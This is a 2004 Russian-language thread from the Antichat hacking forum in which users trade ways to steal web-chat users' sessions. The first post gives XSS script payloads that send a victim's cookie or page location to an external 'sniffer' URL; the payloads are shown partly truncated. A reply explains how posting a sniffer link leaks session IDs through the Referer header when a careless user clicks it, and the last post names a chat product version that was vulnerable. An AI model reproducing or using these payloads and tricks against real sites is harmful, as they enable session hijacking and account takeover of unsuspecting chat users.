HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Чаты
Перезагрузить страницу Опять же снифеР!
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 24.06.2004, 16:53
Fr1k
Участник форума
Регистрация: 11.06.2004
Сообщений: 266
Провел на форуме:
15191

Репутация: 13
По умолчанию
Ну воТ! снифер получат куки < script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+d...lt;/script> это я сно но а сесли чат как такого работает не через куки ну а хотя бы по сэссиям... тоесть присваивает каждому юзеру сэссию... непомню где видел... но чатов таких много! я думаю покатит и такой ХОД:

< script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+l...lt;/script>
 

  #2  
Старый 24.06.2004, 21:14
zFailure
Участник форума
Регистрация: 06.06.2004
Сообщений: 169
Провел на форуме:
0

Репутация: 82
По умолчанию
любой webчат идентифицирует юзеров либо чере куки либо через get/post запросы (либо и то и другое, но в этом случае они чаще друг друга дополнялют)

если чта передает ID сессии через URL то можно просто выкинуть ссылку на снифер в чат, какойнить лошок кликнет и его IDшник уплывет в переменной HTTP_REFERER =) БЕЗ ВСЯКИХ СКРИПТОВ!
 

  #3  
Старый 25.06.2004, 09:16
Fr1k
Участник форума
Регистрация: 11.06.2004
Сообщений: 266
Провел на форуме:
15191

Репутация: 13
По умолчанию
ХМ.! ну это понятно! но для этого нужны тэги! а тэги как такого в нормльных чатах фильтруются! вот и ссылка уже не проходит! я почему написал это потому что встретился с этой проблемой  в чате Eastwood  него до версии 5-56 работал чат через сэссии! выше версии начали работать через куки!
 
 



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.